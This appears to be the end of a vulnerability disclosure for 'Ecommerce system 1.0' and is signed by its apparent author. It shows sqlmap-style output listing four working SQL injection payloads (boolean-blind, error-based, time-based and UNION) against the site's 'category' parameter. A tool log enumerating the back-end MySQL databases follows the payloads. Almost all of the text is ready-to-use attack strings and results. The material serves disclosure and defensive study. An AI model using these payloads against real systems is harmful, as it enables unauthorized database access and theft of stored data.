Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=-2854' OR 6075=6075#

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=' OR (SELECT 2158 FROM(SELECT COUNT(*),CONCAT(0x71706a7a71,(SELECT (ELT(2158=2158,1))),0x7170767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FBZp

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))dkZy)-- vkPi

Type: UNION query
Title: MySQL UNION query (NULL) - 20 columns
Payload: http://192.168.17.65:80/ecommerce/index.php?q=product&category=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706a7a71,0x644764427169434a594a57726f4a744c517a58554b59485152524842596454684f4d504d6d644868,0x7170767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[11:22:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[11:22:17] [INFO] fetching database names
available databases [6]:
[*] db_ecommerce
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
-------------------------------------------------------------------------------------------------------------
Best Regards!
(Mr) Ngo Van Thien
Ecommerce system 1.0 unauthenticated remote code execution